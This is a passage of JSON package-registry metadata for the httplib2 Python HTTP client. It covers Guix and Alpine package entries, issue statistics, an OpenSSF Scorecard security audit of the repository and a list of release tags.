rl":"pkg:guix/python-httplib2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":32342,"maintainers_count":0,"namespaces_count":0,"keywords_count":1654,"github":"guix-mirror","metadata":{"funded_packages_count":1231},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-08-25T05:05:02.543Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":6093016,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2022-10-30T03:10:35.000Z","latest_release_published_at":"2022-10-30T03:10:35.000Z","latest_release_number":"0.21.0-r0","last_synced_at":"2026-03-19T04:38:37.456Z","created_at":"2023-01-31T20:26:29.594Z","updated_at":"2026-08-23T01:58:08.781Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.17/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/